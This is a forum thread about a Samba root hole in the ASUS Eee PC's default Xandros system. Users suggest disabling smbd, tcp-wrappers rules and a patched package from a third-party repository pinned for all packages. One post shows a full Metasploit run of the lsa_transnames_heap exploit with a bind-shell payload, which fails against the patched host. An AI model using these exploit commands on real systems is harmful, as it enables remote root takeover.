ASUS Eee PC rooted out of the box


#1 jss

    New member

  • Members
  • 1 posts

Posted 09 February 2008 - 12:46 AM

"The first thing we did when we put our hands at the ASUS Eee PC was to test its security. The ASUS Eee PC comes with a customized version of Xandros operating system installed, and some other bundled software like Mozilla Firefox, Pidgin, Skype and OpenOffice.org.

Analysing the running processes of the ASUS Eee PC, the first thing that caught our attention was the running smbd process (the sshd daemon was started by us, and is not enabled by default)."...

http://www.risesecur...g/blog/entry/6/

http://seclists.org/...8/Feb/0086.html

#2 ptopping

    Senior Member

  • Members
  • 321 posts
  • Location: Manchester, England

Posted 09 February 2008 - 01:57 AM

What does this all mean? Is it good, is it bad? Are we all riddled with viruses, and are we being hacked by intruders?

The first thing I did was install a virus checker. I have a Belkin router but haven't installed zone alarm because I thought I would try the default firewall out.

Has anyone had any problems with security with the default system?

#3 LS650

    Senior Member

  • Members
  • 566 posts
  • Location: British Columbia

Posted 09 February 2008 - 02:50 AM

Since the article doesn't actually explain itself in English, I'm going to guess that this is... bad?
It would be nice if the writer of the article or the OP could also post a brief explanation as to what this might mean.
Acer Aspire One
http://wiki.eeeuser.com/ <-- A searchable knowledge base; very helpful for beginners!

#4 BCTripster

    Senior Member

  • Members
  • 116 posts

Posted 09 February 2008 - 02:58 AM

Basically it means that if you use the default Xandros and then enable the SMB (Samba, Windows network sharing) options, your eeepc is susceptible to an intruder gaining root on the machine.

Essentially you'd have to be on the same wifi network as someone with this knowledge and the urge to exploit it, what they'd hope to gain is another question.

Basically you should not be leaving any sensitive information on your eeepc anyway as it is too easy a target for thieves to begin with. If security is a concern for you then you should look at installing a full blown Linux distro with the extra security that provides. The Xandros install is aimed at ease of use and it has removed some security functionalities because of that.

For most users the exploit these guys have discovered won't be an issue. Chances of seeing it in the wild used against you are quite slim.

#5 lagagnon

    ExtrEmE User

  • Members
  • 2,783 posts

Posted 09 February 2008 - 03:01 AM

Quote

Analysing the running processes of the ASUS Eee PC, the first thing that caught our attention was the running smbd process (the sshd daemon was started by us, and is not enabled by default)."...
smbd is run by default on many other Linux distros - it is one part of the Samba daemon for connecting Linux machines to Windows machines. You would have to REALLY know what you are doing to hack into that port. I wouldn't worry about it. You can turn off the smbd daemon. This is more scaremongering than anything. Find the location of the rc.samba or rc.smbd script and make it non-executable.
HowTo Ask Questions the Smart Way
You keep believing, I'll keep evolving. Anon

#6 kost

    Advanced Member

  • Members
  • 60 posts

Posted 10 February 2008 - 01:56 AM

UPGRADE YOUR SAMBA!

I built new Samba packages fixing problem above.
You need to add ftp.linux.hr repository as stated in this topic:
http://forum.eeeuser...ic.php?id=13623

Note that you need to change the pinning of the ftp.linux.hr repository to be higher than the asus/xandros updates (at least while asus/xandros issues the patch).
I've put 955 in the priority field, e.g. you should put:
Package: *
Pin: origin ftp.linux.hr
Pin-Priority: 955

Then issue:
sudo apt-get update
sudo apt-get upgrade

I tried to make everything compatible with the other original xandros packages, so nothing should break.

I also tried to exploit the mentioned vulnerability with this security update applied, and the vulnerability is no longer present after the update; see for yourself:

                |                    |      _) |
 __ `__ \   _ \ __|  _` |  __| __ \  |  _ \  | __|
 |   |   |  __/ |   (   |\__ \ |   | | (   | | |
_|  _|  _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|
                              _|


       =[ msf v3.1-release
+ -- --=[ 265 exploits - 118 payloads
+ -- --=[ 17 encoders - 6 nops
       =[ 46 aux

msf > use linux/samba/lsa_transnames_heap
msf exploit(lsa_transnames_heap) > set RHOST 192.168.9.80
RHOST => 192.168.9.80
msf exploit(lsa_transnames_heap) > set PAYLOAD linux/x86/shell_bind_tcp
PAYLOAD => linux/x86/shell_bind_tcp
msf exploit(lsa_transnames_heap) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Linux vsyscall
   1   Linux Heap Brute Force (Debian/Ubuntu)
   2   Linux Heap Brute Force (Gentoo)
   3   Linux Heap Brute Force (Mandriva)
   4   Linux Heap Brute Force (RHEL/CentOS)
   5   Linux Heap Brute Force (SUSE)
   6   Linux Heap Brute Force (Slackware)
   7   DEBUG


msf exploit(lsa_transnames_heap) > set TARGET 1
TARGET => 1
msf exploit(lsa_transnames_heap) > exploit
[*] Started bind handler
[*] Creating nop sled....
[*] Trying to exploit Samba with address 0x08352000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Calling the vulnerable function...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0x08361000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Calling the vulnerable function...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0x08370000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Calling the vulnerable function...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0x0837f000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Calling the vulnerable function...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0x0838e000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Calling the vulnerable function...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0x0839d000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Calling the vulnerable function...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0x083ac000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Calling the vulnerable function...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0x083bb000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Calling the vulnerable function...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0x083ca000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Calling the vulnerable function...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0x083d9000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Calling the vulnerable function...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0x083e8000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Calling the vulnerable function...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0x083f7000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Calling the vulnerable function...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0x08406000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Calling the vulnerable function...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0x08415000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Calling the vulnerable function...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0x08424000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Calling the vulnerable function...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0x08433000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.9.80[\lsarpc] ...
[*] Calling the vulnerable function...
[-] Server is most likely patched...
msf exploit(lsa_transnames_heap) >
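
An added check to go with kost's upgrade instructions (example code written for this page, not kost's package, a Xandros tool, or anything from the thread). Pinning a repository is easy to get subtly wrong, and "apt-get upgrade" will happily report nothing to do if the pin did not take effect, so the script below writes the stanza from the post and then parses "apt-cache policy samba" output to confirm that the Candidate version really comes from ftp.linux.hr. Assumptions: the repository hostname appears in the URL column of apt-cache policy output (it does for a normal "deb http://ftp.linux.hr ..." source line), and the two policy listings are constructed with placeholder version strings and an invented vendor URL, not real Xandros or ftp.linux.hr package versions.

```shell
#!/bin/sh
# Added example, not from kost's post: confirm that an apt pin on a third-party
# repository actually wins before trusting "apt-get upgrade" to pull the fixed
# Samba from it.  Assumption: the repository hostname (here ftp.linux.hr, from
# the post) appears in the URL column of "apt-cache policy" output.

# The pin stanza kost describes, for /etc/apt/preferences.  A normal archive
# gets priority 500, so 955 beats it; 1000 or more would also allow downgrades.
pin_stanza() {
    printf 'Package: *\nPin: origin %s\nPin-Priority: %s\n' "$1" "$2"
}

# Parse "apt-cache policy <pkg>" output: print "<priority> <url>" for the
# version-table entry that supplies the Candidate, and succeed only when that
# URL contains ORIGIN.  Any other result means the pin is not in effect.
check_pin() {
    printf '%s\n' "$1" | awk -v origin="$2" '
        /^  Candidate:/ { cand = $2; next }
        cand != "" && ($1 == cand || ($1 == "***" && $2 == cand)) { want = 1; next }
        want && NF >= 2 { print $1, $2; ok = (index($2, origin) > 0); exit }
        END { exit !ok }'
}

# Constructed apt-cache policy output with placeholder version strings (not
# real Xandros or ftp.linux.hr package versions); the vendor URL is invented.
POLICY_PINNED='samba:
  Installed: 3.0.0-orig1
  Candidate: 3.0.0-fixed.hr1
  Version table:
     3.0.0-fixed.hr1 0
        955 http://ftp.linux.hr eee/ Packages
 *** 3.0.0-orig1 0
        500 http://updates.vendor.invalid p701/ Packages
        100 /var/lib/dpkg/status'

# Same machine without the pin: at equal priority the vendor archive still
# supplies the candidate, so the fixed build is never installed.
POLICY_UNPINNED='samba:
  Installed: 3.0.0-orig1
  Candidate: 3.0.0-orig1
  Version table:
     3.0.0-fixed.hr1 0
        500 http://ftp.linux.hr eee/ Packages
 *** 3.0.0-orig1 0
        500 http://updates.vendor.invalid p701/ Packages
        100 /var/lib/dpkg/status'

# Dry run against the constructed listings.
pin_stanza ftp.linux.hr 955
for p in "$POLICY_PINNED" "$POLICY_UNPINNED"; do
    if check_pin "$p" ftp.linux.hr; then echo "pin in effect"; else echo "pin NOT in effect"; fi
done
```

On the Eee itself, source the file and run `check_pin "$(apt-cache policy samba)" ftp.linux.hr` after `apt-get update`; do the same for samba-common and any other samba-* package you have installed. Note that kost's `Package: *` makes the third-party repository win for every package it carries, not just Samba; if you want to limit that, use one stanza per package name instead.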


#7 Tyleeer

    Member

  • Members
  • 11 posts
  • Location: Melbourne, AUS

Posted 10 February 2008 - 04:52 AM

Disable or remove smbd if you are not required to share files with Windows systems. Easy.

Read here for more info: http://forum.eeeuser...ic.php?id=14237

Funny how people hit the panic button without understanding the whole situation. Read, people, READ!

knowledge is power!
701 4G - Black - O/C'd - 8GB SanDisk SDHC - 2GB RAM - Micro USB BT - XP coming soon :D

#8 rudolf

    Member

  • Members
  • 21 posts

Posted 10 February 2008 - 09:50 AM

There is a much easier way to disable samba:
Press ctrl-alt-t for a terminal, there enter:
sudo chmod a-x /etc/init.d/samba
then press ctrl-d to exit terminal.
Reboot.

To check success, start a terminal as above and enter:
ps -e and look for smbd. No smbd, no samba.

To get samba running again, do above with "a+x" instead.

I can't figure out why they run samba anyway.

#9 Neil Darlow

    Member

  • Members
  • 19 posts
  • Location: Bedfordshire, UK

Posted 10 February 2008 - 01:41 PM

I see that the Eee has tcp-wrappers installed.

It makes sense to create an entry in /etc/hosts.allow for smbd that only permits access from your local network. This will protect you when you use the Eee away from home.
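
The two mitigations above (rudolf's "make sure smbd is not running" check and Neil Darlow's hosts.allow entry) are worth testing before the netbook leaves the house, because a tcp-wrappers rule that is never consulted gives no protection at all. The script below is an added example written for this page, not code from either poster or from the Eee's Xandros image. It assumes a home LAN of 192.168.1.0/24 (change LAN_NET and LAN_MASK) and, for the hosts.allow part, that the Eee's smbd is linked against libwrap, since /etc/hosts.allow and /etc/hosts.deny only affect daemons built with libwrap or started through tcpd; `ldd "$(command -v smbd)" | grep libwrap` tells you which. Samba's own `hosts allow`/`hosts deny` settings in smb.conf are enforced by smbd itself regardless, so the script prints those as well. The ps listings it checks are constructed, not captured from a real Eee.

```shell
#!/bin/sh
# Added example (not from rudolf's or Neil Darlow's posts): lock smbd down to
# the home LAN and verify both the tcp-wrappers rule and the "is smbd still
# running" check before relying on them.
# Assumptions: the LAN is 192.168.1.0/24 (change LAN_NET/LAN_MASK), and smbd
# on the Eee honours /etc/hosts.allow, which is only true for a binary linked
# against libwrap (check: ldd "$(command -v smbd)" | grep libwrap).

LAN_NET=192.168.1.0
LAN_MASK=255.255.255.0

# Dotted quad -> integer, POSIX arithmetic only (no external tools).
ip2int() {
    old_ifs=$IFS
    IFS=.
    set -- $1
    IFS=$old_ifs
    echo $(( ($1 << 24) | ($2 << 16) | ($3 << 8) | $4 ))
}

# True (exit 0) when CLIENT lies inside NET/MASK.
in_net() {
    client=$(ip2int "$1"); net=$(ip2int "$2"); mask=$(ip2int "$3")
    [ $(( client & mask )) -eq $(( net & mask )) ]
}

# The rules themselves.  tcp-wrappers checks hosts.allow first, then
# hosts.deny, and lets through anything matched by neither, so the deny
# line is what actually closes smbd to strangers on a cafe hotspot.
hosts_allow_rule() { printf 'smbd : 127.0.0.1 %s/%s\n' "$LAN_NET" "$LAN_MASK"; }
hosts_deny_rule()  { printf 'smbd : ALL\n'; }

# Samba's own equivalent, enforced by smbd itself whether or not it was built
# with libwrap; goes under [global] in /etc/samba/smb.conf.
smbconf_rules() {
    printf 'hosts allow = 127.0.0.1 %s/%s\nhosts deny = ALL\n' "$LAN_NET" "$LAN_MASK"
}

# What tcp-wrappers would decide for a given client under the rules above.
wrap_decision() {
    if in_net "$1" "$LAN_NET" "$LAN_MASK" || [ "$1" = 127.0.0.1 ]; then
        echo allow
    else
        echo deny
    fi
}

# rudolf's "ps -e and look for smbd", as a function over a ps listing so the
# same check can be run on a saved listing.  Exit 0 if smbd is present.
smbd_running() {
    printf '%s\n' "$1" | awk '$NF == "smbd" { found = 1 } END { exit !found }'
}

# Append the rules once (needs root).  The grep guards against duplicates.
install_rules() {
    grep -qs '^smbd' /etc/hosts.allow || hosts_allow_rule >> /etc/hosts.allow
    grep -qs '^smbd' /etc/hosts.deny  || hosts_deny_rule  >> /etc/hosts.deny
}

# Constructed "ps -e" listings (not captured from a real Eee).
PS_WITH_SMBD='  PID TTY          TIME CMD
    1 ?        00:00:01 init
 2531 ?        00:00:00 smbd
 2540 ?        00:00:00 nmbd'
PS_WITHOUT_SMBD='  PID TTY          TIME CMD
    1 ?        00:00:01 init
 2540 ?        00:00:00 nmbd'

# Dry run: show what a LAN neighbour and a hotspot stranger would get.
for c in 192.168.1.42 10.0.0.5; do
    echo "$c -> $(wrap_decision "$c")"
done
smbconf_rules
```

Run it once as a dry run, then `sudo sh -c '. ./lockdown.sh; install_rules'` (whatever you named the file) to append the entries, and check the live daemon with `smbd_running "$(ps -e)"`. The 127.0.0.1 entry keeps the Eee's own Samba browsing working; drop it if you do not use that. Bear in mind that neither rule helps on a LAN you do not control: on a public hotspot the other clients are inside the same /24, which is exactly why the earlier posts suggest simply not running smbd at all unless you need it.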

#10 mkrishnan

    ExtrEmE User

  • Moderators
  • 3,444 posts
  • Location: Grand Rapids, MI, USA

Posted 11 February 2008 - 11:30 PM

Please use this detailed thread (which includes numerous solutions or workarounds) for further discussion.

http://forum.eeeuser...ic.php?id=14237

There's some great stuff in this thread here, but this way we can keep it all together. :)
Mohan
